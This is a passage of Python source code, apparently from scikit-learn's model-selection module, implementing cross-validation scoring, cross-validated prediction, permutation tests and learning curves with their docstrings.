purposes. sklearn.metrics.make_scorer : Make a scorer from a performance metric or loss function. """ # check_scoring raises an error for multimetric input: cross_val_score # supports a single metric only scorer = check_scoring(estimator, scoring=scoring) cv_results = cross_validate(estimator=estimator, X=X, y=y, groups=groups, scoring={'score': scorer}, cv=cv, n_jobs=n_jobs, verbose=verbose, fit_params=fit_params, pre_dispatch=pre_dispatch, error_score=error_score) return cv_results['test_score'] def _fit_and_score(estimator, X, y, scorer, train, test, verbose, parameters, fit_params, return_train_score=False, return_parameters=False, return_n_test_samples=False, return_times=False, return_estimator=False, split_progress=None, candidate_progress=None, error_score=np.nan): """Fit estimator and compute scores for a given dataset split. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. scorer : A single callable or dict mapping scorer name to the callable If it is a single callable, the return value for ``train_scores`` and ``test_scores`` is a single float. For a dict, it should be one mapping the scorer name to the scorer callable object / function. The callable object / function should have signature ``scorer(estimator, X, y)``. train : array-like of shape (n_train_samples,) Indices of training samples. test : array-like of shape (n_test_samples,) Indices of test samples. verbose : int The verbosity level. error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. parameters : dict or None Parameters to be set on the estimator. fit_params : dict or None Parameters that will be passed to ``estimator.fit``. return_train_score : bool, default=False Compute and return score on training set.
return_parameters : bool, default=False Return the parameters that have been used for the estimator. split_progress : {list, tuple} of int, default=None A list or tuple of format (<current_split_id>, <total_num_of_splits>). candidate_progress : {list, tuple} of int, default=None A list or tuple of format (<current_candidate_id>, <total_number_of_candidates>). return_n_test_samples : bool, default=False Whether to return the ``n_test_samples``. return_times : bool, default=False Whether to return the fit/score times. return_estimator : bool, default=False Whether to return the fitted estimator. Returns ------- result : dict with the following attributes train_scores : dict of scorer name -> float Score on training set (for all the scorers), returned only if `return_train_score` is `True`. test_scores : dict of scorer name -> float Score on testing set (for all the scorers). n_test_samples : int Number of test samples. fit_time : float Time spent for fitting in seconds. score_time : float Time spent for scoring in seconds. parameters : dict or None The parameters that have been evaluated. estimator : estimator object The fitted estimator. fit_failed : bool Whether the estimator failed to fit. """ if not isinstance(error_score, numbers.Number) and error_score != 'raise': raise ValueError( "error_score must be the string 'raise' or a numeric value. " "(Hint: if using 'raise', please make sure that it has been " "spelled correctly.)" ) progress_msg = "" if verbose > 2: if split_progress is not None: progress_msg = f" {split_progress[0]+1}/{split_progress[1]}" if candidate_progress and verbose > 9: progress_msg += (f"; {candidate_progress[0]+1}/" f"{candidate_progress[1]}") if verbose > 1: if parameters is None: params_msg = '' else: sorted_keys = sorted(parameters) # Ensure deterministic output params_msg = (', '.join(f'{k}={parameters[k]}' for k in sorted_keys)) if verbose > 9: start_msg = f"[CV{progress_msg}] START {params_msg}" print(f"{start_msg}{(80 - len(start_msg)) * '.'}") # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} fit_params = _check_fit_params(X, fit_params, train) if parameters is not None: # clone after setting parameters in case any parameters # are estimators (like pipeline steps) # because pipeline doesn't clone steps in fit cloned_parameters = {} for k, v in parameters.items(): cloned_parameters[k] = clone(v, safe=False) estimator = estimator.set_params(**cloned_parameters) start_time = time.time() X_train, y_train = _safe_split(estimator, X, y, train) X_test, y_test = _safe_split(estimator, X, y, test, train) result = {} try: if y_train is None: estimator.fit(X_train, **fit_params) else: estimator.fit(X_train, y_train, **fit_params) except Exception: # Note fit time as time until error fit_time = time.time() - start_time score_time = 0.0 if error_score == 'raise': raise elif isinstance(error_score, numbers.Number): if isinstance(scorer, dict): test_scores = {name: error_score for name in scorer} if return_train_score: train_scores = test_scores.copy() else: test_scores = error_score if return_train_score: train_scores = error_score warnings.warn("Estimator fit failed. The score on this train-test" " partition for these parameters will be set to %f. 
" "Details: \n%s" % (error_score, format_exc()), FitFailedWarning) result["fit_failed"] = True else: fit_time = time.time() - start_time with warnings.catch_warnings(record=True) as score_warnings: test_scores = _score(estimator, X_test, y_test, scorer, error_score) score_time = time.time() - start_time - fit_time if return_train_score: train_scores = _score( estimator, X_train, y_train, scorer, error_score ) if score_warnings: result["fit_failed"] = True for w in score_warnings: warnings.showwarning(w.message, w.category, w.filename, w.lineno, w.file, w.line) else: result["fit_failed"] = False if verbose > 1: total_time = score_time + fit_time end_msg = f"[CV{progress_msg}] END " result_msg = params_msg + (";" if params_msg else "") if verbose > 2: if isinstance(test_scores, dict): for scorer_name in sorted(test_scores): result_msg += f" {scorer_name}=" if isinstance(test_scores[scorer_name], np.ndarray): fmt_str = '' else: fmt_str = '.3f' if return_train_score: scorer_scores = train_scores[scorer_name] result_msg += f"(train={scorer_scores:{fmt_str}}, test={test_scores[scorer_name]:{fmt_str}})," else: result_msg += f"{test_scores[scorer_name]:{fmt_str}}," else: result_msg += " score=" result_msg += (f"{test_scores:.3f}," if not return_train_score else f"(train={train_scores:.3f}, test={test_scores:.3f}),") result_msg += f" total time={logger.short_format_time(total_time)}" # Right align the result_msg end_msg += "." * (80 - len(end_msg) - len(result_msg)) end_msg += result_msg print(end_msg) result["test_scores"] = test_scores if return_train_score: result["train_scores"] = train_scores if return_n_test_samples: result["n_test_samples"] = _num_samples(X_test) if return_times: result["fit_time"] = fit_time result["score_time"] = score_time if return_parameters: result["parameters"] = parameters if return_estimator: result["estimator"] = estimator return result def _score(estimator, X_test, y_test, scorer, error_score="raise"): """Compute the score(s) of an estimator on a given test set. Will return a dict of floats if `scorer` is a dict, otherwise a single float is returned. """ if isinstance(scorer, dict): # will cache method calls if needed. scorer() returns a dict scorer = _MultimetricScorer(**scorer) try: if y_test is None: scores = scorer(estimator, X_test) else: scores = scorer(estimator, X_test, y_test) except Exception: if error_score == 'raise': raise else: if isinstance(scorer, _MultimetricScorer): scores = {name: error_score for name in scorer._scorers} else: scores = error_score warnings.warn( f"Scoring failed. The score on this train-test partition for " f"these parameters will be set to {error_score}. Details: \n" f"{format_exc()}", UserWarning, ) error_msg = ( "scoring must return a number, got %s (%s) instead. (scorer=%s)" ) if isinstance(scores, dict): for name, score in scores.items(): if hasattr(score, 'item'): with suppress(ValueError): # e.g. unwrap memmapped scalars score = score.item() elif isinstance(score, tuple): score = np.stack(score) if not isinstance(score, (numbers.Number, np.ndarray)): raise ValueError(error_msg % (score, type(score), name)) scores[name] = score else: # scalar if hasattr(scores, 'item'): with suppress(ValueError): # e.g. 
unwrap memmapped scalars scores = scores.item() if not isinstance(scores, numbers.Number): raise ValueError(error_msg % (scores, type(scores), scorer)) return scores @_deprecate_positional_args def cross_val_predict(estimator, X, y=None, *, groups=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', method='predict'): """Generate cross-validated estimates for each input data point The data is split according to the cv parameter. Each sample belongs to exactly one test set, and its prediction is computed with an estimator fitted on the corresponding training set. Passing these predictions into an evaluation metric may not be a valid way to measure generalization performance. Results can differ from :func:`cross_validate` and :func:`cross_val_score` unless all test sets have equal size and the metric decomposes over samples. Read more in the :ref:`User Guide <cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' and 'predict' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be, for example, a list, or an array of at least 2d. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and predicting are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' method : {'predict', 'predict_proba', 'predict_log_proba', \ 'decision_function'}, default='predict' The method to be invoked by `estimator`. Returns ------- predictions : ndarray This is the result of calling `method`. 
Shape: - When `method` is 'predict' and in special case where `method` is 'decision_function' and the target is binary: (n_samples,) - When `method` is one of {'predict_proba', 'predict_log_proba', 'decision_function'} (unless special case above): (n_samples, n_classes) - If `estimator` is :term:`multioutput`, an extra dimension 'n_outputs' is added to the end of each shape above. See Also -------- cross_val_score : Calculate score for each CV split. cross_validate : Calculate one or more scores and timings for each CV split. Notes ----- In the case that one or more classes are absent in a training portion, a default score needs to be assigned to all instances for that class if ``method`` produces columns per class, as in {'decision_function', 'predict_proba', 'predict_log_proba'}. For ``predict_proba`` this value is 0. In order to ensure finite output, we approximate negative infinity by the minimum finite float value for the dtype in other cases. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_val_predict >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() >>> y_pred = cross_val_predict(lasso, X, y, cv=3) """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) splits = list(cv.split(X, y, groups)) test_indices = np.concatenate([test for _, test in splits]) if not _check_is_permutation(test_indices, _num_samples(X)): raise ValueError('cross_val_predict only works for partitions') # If classification methods produce multiple columns of output, # we need to manually encode classes to ensure consistent column ordering. encode = method in ['decision_function', 'predict_proba', 'predict_log_proba'] and y is not None if encode: y = np.asarray(y) if y.ndim == 1: le = LabelEncoder() y = le.fit_transform(y) elif y.ndim == 2: y_enc = np.zeros_like(y, dtype=int) for i_label in range(y.shape[1]): y_enc[:, i_label] = LabelEncoder().fit_transform(y[:, i_label]) y = y_enc # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. parallel = Parallel(n_jobs=n_jobs, verbose=verbose, pre_dispatch=pre_dispatch) predictions = parallel(delayed(_fit_and_predict)( clone(estimator), X, y, train, test, verbose, fit_params, method) for train, test in splits) inv_test_indices = np.empty(len(test_indices), dtype=int) inv_test_indices[test_indices] = np.arange(len(test_indices)) if sp.issparse(predictions[0]): predictions = sp.vstack(predictions, format=predictions[0].format) elif encode and isinstance(predictions[0], list): # `predictions` is a list of method outputs from each fold. # If each of those is also a list, then treat this as a # multioutput-multiclass task. We need to separately concatenate # the method outputs for each label into an `n_labels` long list. n_labels = y.shape[1] concat_pred = [] for i_label in range(n_labels): label_preds = np.concatenate([p[i_label] for p in predictions]) concat_pred.append(label_preds) predictions = concat_pred else: predictions = np.concatenate(predictions) if isinstance(predictions, list): return [p[inv_test_indices] for p in predictions] else: return predictions[inv_test_indices] def _fit_and_predict(estimator, X, y, train, test, verbose, fit_params, method): """Fit estimator and predict values for a given dataset split. Read more in the :ref:`User Guide <cross_validation>`. 
Parameters ---------- estimator : estimator object implementing 'fit' and 'predict' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. .. versionchanged:: 0.20 X is only required to be an object with finite length or shape now y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. train : array-like of shape (n_train_samples,) Indices of training samples. test : array-like of shape (n_test_samples,) Indices of test samples. verbose : int The verbosity level. fit_params : dict or None Parameters that will be passed to ``estimator.fit``. method : str Invokes the passed method name of the passed estimator. Returns ------- predictions : sequence Result of calling 'estimator.method' """ # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} fit_params = _check_fit_params(X, fit_params, train) X_train, y_train = _safe_split(estimator, X, y, train) X_test, _ = _safe_split(estimator, X, y, test, train) if y_train is None: estimator.fit(X_train, **fit_params) else: estimator.fit(X_train, y_train, **fit_params) func = getattr(estimator, method) predictions = func(X_test) encode = method in ['decision_function', 'predict_proba', 'predict_log_proba'] and y is not None if encode: if isinstance(predictions, list): predictions = [_enforce_prediction_order( estimator.classes_[i_label], predictions[i_label], n_classes=len(set(y[:, i_label])), method=method) for i_label in range(len(predictions))] else: # A 2D y array should be a binary label indicator matrix n_classes = len(set(y)) if y.ndim == 1 else y.shape[1] predictions = _enforce_prediction_order( estimator.classes_, predictions, n_classes, method) return predictions def _enforce_prediction_order(classes, predictions, n_classes, method): """Ensure that prediction arrays have correct column order When doing cross-validation, if one or more classes are not present in the subset of data used for training, then the output prediction array might not have the same columns as other folds. Use the list of class names (assumed to be ints) to enforce the correct column order. Note that `classes` is the list of classes in this fold (a subset of the classes in the full training set) and `n_classes` is the number of classes in the full training set. """ if n_classes != len(classes): recommendation = ( 'To fix this, use a cross-validation ' 'technique resulting in properly ' 'stratified folds') warnings.warn('Number of classes in training fold ({}) does ' 'not match total number of classes ({}). ' 'Results may not be appropriate for your use case. ' '{}'.format(len(classes), n_classes, recommendation), RuntimeWarning) if method == 'decision_function': if (predictions.ndim == 2 and predictions.shape[1] != len(classes)): # This handles the case when the shape of predictions # does not match the number of classes used to train # it with. This case is found when sklearn.svm.SVC is # set to `decision_function_shape='ovo'`. raise ValueError('Output shape {} of {} does not match ' 'number of classes ({}) in fold. ' 'Irregular decision_function outputs ' 'are not currently supported by ' 'cross_val_predict'.format( predictions.shape, method, len(classes))) if len(classes) <= 2: # In this special case, `predictions` contains a 1D array. raise ValueError('Only {} class/es in training fold, but {} ' 'in overall dataset. This ' 'is not supported for decision_function ' 'with imbalanced folds. 
{}'.format( len(classes), n_classes, recommendation)) float_min = np.finfo(predictions.dtype).min default_values = {'decision_function': float_min, 'predict_log_proba': float_min, 'predict_proba': 0} predictions_for_all_classes = np.full((_num_samples(predictions), n_classes), default_values[method], dtype=predictions.dtype) predictions_for_all_classes[:, classes] = predictions predictions = predictions_for_all_classes return predictions def _check_is_permutation(indices, n_samples): """Check whether indices is a reordering of the array np.arange(n_samples) Parameters ---------- indices : ndarray int array to test n_samples : int number of expected elements Returns ------- is_partition : bool True iff sorted(indices) is np.arange(n) """ if len(indices) != n_samples: return False hit = np.zeros(n_samples, dtype=bool) hit[indices] = True if not np.all(hit): return False return True @_deprecate_positional_args def permutation_test_score(estimator, X, y, *, groups=None, cv=None, n_permutations=100, n_jobs=None, random_state=0, verbose=0, scoring=None, fit_params=None): """Evaluate the significance of a cross-validated score with permutations Permutes targets to generate 'randomized data' and compute the empirical p-value against the null hypothesis that features and targets are independent. The p-value represents the fraction of randomized data sets where the estimator performed as well or better than in the original data. A small p-value suggests that there is a real dependency between features and targets which has been used by the estimator to give good predictions. A large p-value may be due to lack of real dependency between features and targets or the estimator was not able to use the dependency to give good predictions. Read more in the :ref:`User Guide <permutation_test_score>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape at least 2D The data to fit. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Labels to constrain permutation within groups, i.e. ``y`` values are permuted among samples with the same group identifier. When not specified, ``y`` values are permuted among all samples. When a grouped cross-validator is used, the group labels are also passed on to the ``split`` method of the cross-validator. The cross-validator uses them for grouping the samples while splitting the dataset into train/test set. scoring : str or callable, default=None A single str (see :ref:`scoring_parameter`) or a callable (see :ref:`scoring`) to evaluate the predictions on the test set. If None the estimator's score method is used. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. 
n_permutations : int, default=100 Number of times to permute ``y``. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the cross-validated score are parallelized over the permutations. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. random_state : int, RandomState instance or None, default=0 Pass an int for reproducible output for permutation of ``y`` values among samples. See :term:`Glossary <random_state>`. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 Returns ------- score : float The true score without permuting targets. permutation_scores : array of shape (n_permutations,) The scores obtained for each permutations. pvalue : float The p-value, which approximates the probability that the score would be obtained by chance. This is calculated as: `(C + 1) / (n_permutations + 1)` Where C is the number of permutations whose score >= the true score. The best possible p-value is 1/(n_permutations + 1), the worst is 1.0. Notes ----- This function implements Test 1 in: Ojala and Garriga. `Permutation Tests for Studying Classifier Performance <http://www.jmlr.org/papers/volume11/ojala10a/ojala10a.pdf>`_. The Journal of Machine Learning Research (2010) vol. 11 """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) scorer = check_scoring(estimator, scoring=scoring) random_state = check_random_state(random_state) # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. score = _permutation_test_score(clone(estimator), X, y, groups, cv, scorer, fit_params=fit_params) permutation_scores = Parallel(n_jobs=n_jobs, verbose=verbose)( delayed(_permutation_test_score)( clone(estimator), X, _shuffle(y, groups, random_state), groups, cv, scorer, fit_params=fit_params) for _ in range(n_permutations)) permutation_scores = np.array(permutation_scores) pvalue = (np.sum(permutation_scores >= score) + 1.0) / (n_permutations + 1) return score, permutation_scores, pvalue def _permutation_test_score(estimator, X, y, groups, cv, scorer, fit_params): """Auxiliary function for permutation_test_score""" # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} avg_score = [] for train, test in cv.split(X, y, groups): X_train, y_train = _safe_split(estimator, X, y, train) X_test, y_test = _safe_split(estimator, X, y, test, train) fit_params = _check_fit_params(X, fit_params, train) estimator.fit(X_train, y_train, **fit_params) avg_score.append(scorer(estimator, X_test, y_test)) return np.mean(avg_score) def _shuffle(y, groups, random_state): """Return a shuffled copy of y eventually shuffle among same groups.""" if groups is None: indices = random_state.permutation(len(y)) else: indices = np.arange(len(groups)) for group in np.unique(groups): this_mask = (groups == group) indices[this_mask] = random_state.permutation(indices[this_mask]) return _safe_indexing(y, indices) @_deprecate_positional_args def learning_curve(estimator, X, y, *, groups=None, train_sizes=np.linspace(0.1, 1.0, 5), cv=None, scoring=None, exploit_incremental_learning=False, n_jobs=None, pre_dispatch="all", verbose=0, shuffle=False, random_state=None, error_score=np.nan, return_times=False, fit_params=None): """Learning curve. 
    Determines cross-validated training and test scores for different
    training set sizes.

    A cross-validation generator splits the whole dataset k times in training
    and test data. Subsets of the training set with varying sizes will be used
    to train the estimator and a score for each training subset size and the
    test set will be computed. Afterwards, the scores will be averaged over
    all k runs for each training subset size.

    Read more in the :ref:`User Guide <learning_curve>`.

    Parameters
    ----------
    estimator : object type that implements the "fit" and "predict" methods
        An object of that type which is cloned for each validation.

    X : array-like of shape (n_samples, n_features)
        Training vector, where n_samples is the number of samples and
        n_features is the number of features.

    y : array-like of shape (n_samples,) or (n_samples, n_outputs)
        Target relative to X for classification or regression;
        None for unsupervised learning.

    groups : array-like of shape (n_samples,), default=None
        Group labels for the samples used while splitting the dataset into
        train/test set. Only used in conjunction with a "Group" :term:`cv`
        instance (e.g., :class:`GroupKFold`).

    train_sizes : array-like of shape (n_ticks,), \
            default=np.linspace(0.1, 1.0, 5)
        Relative or absolute numbers of training examples that will be used to
        generate the learning curve. If the dtype is float, it is regarded as a
        fraction of the maximum size of the training set (that is determined
        by the selected validation method), i.e. it has to be within (0, 1].
        Otherwise it is interpreted as absolute sizes of the training sets.
        Note that for classification the number of samples usually has to
        be big enough to contain at least one sample from each class.

    cv : int, cross-validation generator or an iterable, default=None
        Determines the cross-validation splitting strategy.
        Possible inputs for cv are:

        - None, to use the default 5-fold cross validation,
        - int, to specify the number of folds in a `(Stratified)KFold`,
        - :term:`CV splitter`,
        - An iterable yielding (train, test) splits as arrays of indices.

        For int/None inputs, if the estimator is a classifier and ``y`` is
        either binary or multiclass, :class:`StratifiedKFold` is used. In all
        other cases, :class:`KFold` is used.

        Refer :ref:`User Guide <cross_validation>` for the various
        cross-validation strategies that can be used here.

        .. versionchanged:: 0.22
            ``cv`` default value if None changed from 3-fold to 5-fold.

    scoring : str or callable, default=None
        A str (see model evaluation documentation) or
        a scorer callable object / function with signature
        ``scorer(estimator, X, y)``.

    exploit_incremental_learning : bool, default=False
        If the estimator supports incremental learning, this will be
        used to speed up fitting for different training set sizes.

    n_jobs : int, default=None
        Number of jobs to run in parallel. Training the estimator and
        computing the score are parallelized over the different training
        and test sets. ``None`` means 1 unless in a
        :obj:`joblib.parallel_backend` context. ``-1`` means using all
        processors. See :term:`Glossary <n_jobs>` for more details.

    pre_dispatch : int or str, default='all'
        Number of predispatched jobs for parallel execution (default is
        all). The option can reduce the allocated memory. The str can
        be an expression like '2*n_jobs'.

    verbose : int, default=0
        Controls the verbosity: the higher, the more messages.

    shuffle : bool, default=False
        Whether to shuffle training data before taking prefixes of it
        based on ``train_sizes``.
    random_state : int, RandomState instance or None, default=None
        Used when ``shuffle`` is True. Pass an int for reproducible
        output across multiple function calls.
        See :term:`Glossary <random_state>`.

    error_score : 'raise' or numeric, default=np.nan
        Value to assign to the score if an error occurs in estimator fitting.
        If set to 'raise', the error is raised.
        If a numeric value is given, FitFailedWarning is raised.

        .. versionadded:: 0.20

    return_times : bool, default=False
        Whether to return the fit and score times.

    fit_params : dict, default=None
        Parameters to pass to the fit method of the estimator.

        .. versionadded:: 0.24

    Returns
    -------
    train_sizes_abs : array of shape (n_unique_ticks,)
        Numbers of training examples that have been used to generate the
        learning curve. Note that the number of ticks might be less
        than n_ticks because duplicate entries will be removed.

    train_scores : array of shape (n_ticks, n_cv_folds)
        Scores on training sets.

    test_scores : array of shape (n_ticks, n_cv_folds)
        Scores on test set.

    fit_times : array of shape (n_ticks, n_cv_folds)
        Times spent for fitting in seconds. Only present if ``return_times``
        is True.

    score_times : array of shape (n_ticks, n_cv_folds)
        Times spent for scoring in seconds. Only present if ``return_times``
        is True.

    Notes
    -----
    See :ref:`examples/model_selection/plot_learning_curve.py
    <sphx_glr_auto_examples_model_selection_plot_learning_curve.py>`
    """
    if exploit_incremental_learning and not hasattr(estimator, "partial_fit"):
        raise ValueError("An estimator must support the partial_fit interface "
                         "to exploit incremental learning")
    X, y, groups = indexable(X, y, groups)

    cv = check_cv(cv, y, classifier=is_classifier(estimator))
    # Store it as list as we will be iterating over the list multiple times
    cv_iter = list(cv.split(X, y, groups))

    scorer = check_scoring(estimator, scoring=scoring)

    n_max_training_samples = len(cv_iter[0][0])
    # Because the lengths of folds can be significantly different, it is
    # not guaranteed that we use all of the available training data when we
    # use the first 'n_max_training_samples' samples.
train_sizes_abs = _translate_train_sizes(train_sizes, n_max_training_samples) n_unique_ticks = train_sizes_abs.shape[0] if verbose > 0: print("[learning_curve] Training set sizes: " + str(train_sizes_abs)) parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch, verbose=verbose) if shuffle: rng = check_random_state(random_state) cv_iter = ((rng.permutation(train), test) for train, test in cv_iter) if exploit_incremental_learning: classes = np.unique(y) if is_classifier(estimator) else None out = parallel(delayed(_incremental_fit_estimator)( clone(estimator), X, y, classes, train, test, train_sizes_abs, scorer, verbose, return_times, error_score=error_score, fit_params=fit_params) for train, test in cv_iter ) out = np.asarray(out).transpose((2, 1, 0)) else: train_test_proportions = [] for train, test in cv_iter: for n_train_samples in train_sizes_abs: train_test_proportions.append((train[:n_train_samples], test)) results = parallel(delayed(_fit_and_score)( clone(estimator), X, y, scorer, train, test, verbose, parameters=None, fit_params=fit_params, return_train_score=True, error_score=error_score, return_times=return_times) for train, test in train_test_proportions ) results = _aggregate_score_dicts(results) train_scores = results["train_scores"].reshape(-1, n_unique_ticks).T test_scores = results["test_scores"].reshape(-1, n_unique_ticks).T out = [train_scores, test_scores] if return_times: fit_times = results["fit_time"].reshape(-1, n_unique_ticks).T score_times = results["score_time"].reshape(-1, n_unique_ticks).T out.extend([fit_times, score_times]) ret = train_sizes_abs, out[0], out[1] if return_times: ret = ret + (out[2], out[3]) return ret def _translate_train_sizes(train_sizes, n_max_training_samples): """Determine absolute sizes of training subsets and validate 'train_sizes'. Examples: _translate_train_sizes([0.5, 1.0], 10) -> [5, 10] _translate_train_sizes([5, 10], 10) -> [5, 10] Parameters ---------- train_sizes : array-like of shape (n_ticks,) Numbers of training examples that will be used to generate the learning curve. If the dtype is float, it is regarded as a fraction of 'n_max_training_samples', i.e. it has to be within (0, 1]. n_max_training_samples : int Maximum number of training samples (upper bound of 'train_sizes'). Returns ------- train_sizes_abs : array of shape (n_unique_ticks,) Numbers of training examples that will be used to generate the learning curve. Note that the number of ticks might be less than n_ticks because duplicate entries will be removed. """ train_sizes_abs = np.asarray(train_sizes) n_ticks = train_sizes_abs.shape[0] n_min_required_samples = np.min(train_sizes_abs) n_max_required_samples = np.max(train_sizes_abs) if np.issubdtype(train_sizes_abs.dtype, np.floating): if n_min_required_samples <= 0.0 or n_max_required_samples > 1.0: raise ValueError("train_sizes has been interpreted as fractions " "of the maximum number of training samples and " "must be within (0, 1], but is within [%f, %f]." % (n_min_required_samples, n_max_required_samples)) train_sizes_abs = (train_sizes_abs * n_max_training_samples).astype( dtype=int, copy=False) train_sizes_abs = np.clip(train_sizes_abs, 1, n_max_training_samples) else: if (n_min_required_samples <= 0 or n_max_required_samples > n_max_training_samples): raise ValueError("train_sizes has been interpreted as absolute " "numbers of training samples and must be within " "(0, %d], but is within [%d, %d]." 
                             % (n_max_training_samples,
                                n_min_required_samples,
                                n_max_required_samples))

    train_sizes_abs = np.unique(train_sizes_abs)
    if n_ticks > train_sizes_abs.shape[0]:
        warnings.warn("Removed duplicate entries from 'train_sizes'. Number "
                      "of ticks will be less than the size of "
                      "'train_sizes' (%d instead of %d)."
                      % (train_sizes_abs.shape[0], n_ticks), RuntimeWarning)

    return train_sizes_abs


def _incremental_fit_estimator(estimator, X, y, classes, train, test,
                               train_sizes, scorer, verbose,
                               return_times, error_score, fit_params):
    """Train estimator on training subsets incrementally and compute scores."""
    train_scores, test_scores, fit_times, score_times = [], [], [], []
    partitions = zip(train_sizes, np.split(train, train_sizes)[:-1])
    if fit_params is None:
        fit_params = {}
    for n_train_samples, partial_train in partitions:
        train_subset = train[:n_train_samples]
        X_train, y_train = _safe_split(estimator, X, y, train_subset)
        X_partial_train, y_partial_train = _safe_split(estimator, X, y,
                                                       partial_train)
        X_test, y_test = _safe_split(estimator, X, y, test, train_subset)
        start_fit = time.time()
        if y_partial_train is None:
            estimator.partial_fit(X_partial_train, classes=classes,
                                  **fit_params)
        else:
            estimator.partial_fit(X_partial_train, y_partial_train,
                                  classes=classes, **fit_params)
        fit_time = time.time() - start_fit
        fit_times.append(fit_time)

        start_score = time.time()

        test_scores.append(
            _score(estimator, X_test, y_test, scorer, error_score)
        )
        train_scores.append(
            _score(estimator, X_train, y_train, scorer, error_score)
        )
        score_time = time.time() - start_score
        score_times.append(score_time)

    ret = ((train_scores, test_scores, fit_times, score_times)
           if return_times else (train_scores, test_scores))

    return np.array(ret).T


@_deprecate_positional_args
def validation_curve(estimator, X, y, *, param_name, param_range, groups=None,
                     cv=None, scoring=None, n_jobs=None, pre_dispatch="all",
                     verbose=0, error_score=np.nan, fit_params=None):
    """Validation curve.

    Determine training and test scores for varying parameter values.

    Compute scores for an estimator with different values of a specified
    parameter. This is similar to grid search with one parameter. However, this
    will also compute training scores and is merely a utility for plotting the
    results.

    Read more in the :ref:`User Guide <validation_curve>`.

    Parameters
    ----------
    estimator : object type that implements the "fit" and "predict" methods
        An object of that type which is cloned for each validation.

    X : array-like of shape (n_samples, n_features)
        Training vector, where n_samples is the number of samples and
        n_features is the number of features.

    y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None
        Target relative to X for classification or regression;
        None for unsupervised learning.

    param_name : str
        Name of the parameter that will be varied.

    param_range : array-like of shape (n_values,)
        The values of the parameter that will be evaluated.

    groups : array-like of shape (n_samples,), default=None
        Group labels for the samples used while splitting the dataset into
        train/test set. Only used in conjunction with a "Group" :term:`cv`
        instance (e.g., :class:`GroupKFold`).

    cv : int, cross-validation generator or an iterable, default=None
        Determines the cross-validation splitting strategy.
        Possible inputs for cv are:

        - None, to use the default 5-fold cross validation,
        - int, to specify the number of folds in a `(Stratified)KFold`,
        - :term:`CV splitter`,
        - An iterable yielding (train, test) splits as arrays of indices.
        For int/None inputs, if the estimator is a classifier and ``y`` is
        either binary or multiclass, :class:`StratifiedKFold` is used. In all
        other cases, :class:`KFold` is used.

        Refer :ref:`User Guide <cross_validation>` for the various
        cross-validation strategies that can be used here.

        .. versionchanged:: 0.22
            ``cv`` default value if None changed from 3-fold to 5-fold.

    scoring : str or callable, default=None
        A str (see model evaluation documentation) or
        a scorer callable object / function with signature
        ``scorer(estimator, X, y)``.

    n_jobs : int, default=None
